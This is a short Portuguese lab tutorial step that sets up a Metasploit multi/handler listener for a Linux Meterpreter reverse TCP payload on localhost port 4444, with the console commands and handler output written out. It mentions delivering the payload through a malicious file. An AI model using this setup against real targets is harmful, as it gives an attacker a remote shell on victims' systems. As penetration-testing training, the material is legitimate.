Configurando um Listener Meterpreter
Nesta etapa final, você aprenderá a configurar um listener (ouvinte) para um payload Meterpreter. O Meterpreter é um payload avançado e rico em recursos que fornece um shell interativo no sistema alvo. Em vez de lançar um exploit, você usará o módulo exploit/multi/handler para escutar conexões de entrada. Isso é útil quando um exploit é entregue por outros meios (por exemplo, um arquivo malicioso) e você precisa capturar a conexão reversa.
Primeiro, mude para o módulo multi/handler.
use exploit/multi/handler
Seu prompt mudará para refletir o novo módulo.
msf6 exploit(multi/handler) >
Em seguida, defina um payload Meterpreter. Usaremos um projetado para sistemas Linux.
set payload linux/x86/meterpreter/reverse_tcp
Agora, configure as opções do listener, LHOST e LPORT, assim como fez anteriormente.
set LHOST 127.0.0.1
Nota: Você pode ver uma mensagem de aviso sobre a vinculação a um endereço de loopback. Isso é normal ao usar o localhost (127.0.0.1) e pode ser ignorado com segurança neste laboratório.
set LPORT 4444
Finalmente, inicie o listener usando o comando exploit.
exploit
O Metasploit iniciará um listener no IP e porta especificados, aguardando a conexão de uma sessão Meterpreter.
[*] Started reverse TCP handler on 127.0.0.1:4444
O console permanecerá ativo, aguardando uma conexão. Em um cenário real, se uma máquina alvo executasse o payload Meterpreter correspondente, uma sessão seria estabelecida aqui. Como nenhum alvo se conectará neste laboratório, você pode parar o listener pressionando Ctrl + C.
Para sair do console do Metasploit, digite exit e pressione Enter.